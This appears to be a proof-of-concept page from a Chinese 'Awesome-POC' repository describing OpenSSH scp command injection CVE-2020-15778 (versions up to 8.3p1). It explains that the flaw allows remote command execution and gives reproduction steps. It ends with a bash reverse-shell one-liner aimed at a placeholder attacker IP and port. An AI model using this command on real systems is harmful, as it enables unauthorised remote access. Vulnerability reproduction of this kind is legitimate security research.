Awesome-POC/server-application/OpenSSH 命令注入漏洞 CVE-2020-15778.md
2022-02-20 16:14:31 +08:00

33 lines
962 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# OpenSSH 命令注入漏洞 CVE-2020-15778
## 漏洞描述
2020年6月9日研究人员Chinmay Pandya在Openssh中发现了一个漏洞于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估作出漏洞通告。
## 漏洞影响
```
OpenSSH <= 8.3p1
```
## 漏洞复现
可用于目标不允许远程登录但SCP开启的情况下远程命令执行
攻击机创建 peiqi.txt ,利用 scp上传文件 到 /tmp 目录下
![image-20220209125535740](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091255788.png)
执行命令 ping dnslog
![image-20220209125550216](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091255296.png)
反弹shell 更换命令即可
```plain
/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1
```